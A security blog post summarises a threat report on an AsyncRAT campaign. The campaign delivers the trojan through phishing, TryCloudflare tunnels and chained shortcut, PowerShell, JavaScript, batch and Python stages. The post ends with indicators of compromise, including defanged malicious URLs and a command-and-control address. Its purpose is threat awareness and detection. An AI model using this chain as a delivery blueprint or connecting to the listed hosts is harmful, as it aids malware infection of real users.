AsyncRAT Abusing Python and TryCloudflare For Stealthy Malware Delivery

Leave a Comment / Blog / By

A recent cybersecurity threat has emerged in the form of AsyncRAT, a remote access trojan (RAT) that leverages Python and TryCloudflare for stealthy malware delivery.

This sophisticated campaign involves a complex sequence of events, starting with phishing emails that deceive users into downloading malicious payloads.

Here the attack chain exploits legitimate infrastructure which makes the detection challenging and pose significant risks to organizations.

The Forcepoint X-Labs research team has detailed this evolving threat, and experts noted that to remain undetected threat actors exploited legitimate infrastructure.

Phishing Email and Initial Payload

The attack begins with a phishing email containing a Dropbox URL. When clicked, this link downloads a ZIP file, which includes an internet shortcut file (.URL format).

Opening this file initiates a series of background downloads while displaying a legitimate-looking PDF to distract the user.

AsyncRAT Attack Chain (Source – ForcePoint)

Stage 1: .URL Analysis

The .URL file contains a TryCloudflare URL, which directs to a directory hosting an .LNK file.

Internet Shortcut File (Source – ForcePoint)

This link leads to a directory with an .LNK file named “RE-002.pdf.1nk.”

Stage 2: .LNK Analysis

Clicking the .LNK file triggers PowerShell to download a JavaScript file from the same TryCloudflare tunnel.

Stage 3: .JS Analysis

The JavaScript file downloads a .BAT file from the same TryCloudflare site.

Deobfuscated JS File with Link to .BAT File (Source – ForcePoint)

Stage 4: .BAT Analysis

The .BAT file uses PowerShell to download a ZIP file containing a Python package. It extracts the ZIP, checks for Python, and runs the Python scripts.

Deobfuscated .BAT File (Source – ForcePoint)

Stage 5: .PY Analysis

The Python package includes a load.py file that executes malicious .BIN files. It uses the ctypes library to interact with Windows APIs.

Actual Malicious Files (Source – ForcePoint)

By using multi-stage obfuscation and legitimate-looking distractions, the attackers evade detection while deploying AsyncRAT and other malware.

Organizations must remain vigilant and adopt robust security measures to detect and block such threats at various stages of the attack chain.

Indicators of Compromise (IOCs)

  • Malicious URLs:
  • hxxps[:]//inventory-card-thumbzilla-ip[.]trycloudflare[.]com/DE/
  • hxxps[:]//mercy-synopsis-notify-motels[.]trycloudflare[.]com/ma[.]zip
  • C2 Servers:
  • 62.60.190.141:3232
  • Hashes:
  • ZIP File: 55724b766dd1fe8bf9dd4cb7094b83b88d57d945

Leave a Comment

Your email address will not be published. Required fields are marked *

Get A Quote
Get A Quote
Scroll to Top